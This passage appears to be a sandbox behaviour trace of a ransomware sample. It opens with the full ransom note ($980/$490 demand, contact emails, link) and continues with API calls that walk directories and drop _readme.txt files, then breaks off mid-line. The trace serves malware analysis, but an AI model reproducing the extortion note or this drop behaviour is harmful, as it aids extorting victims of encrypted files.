ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.662] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.663] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.663] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.663] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.663] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.663] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.664] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 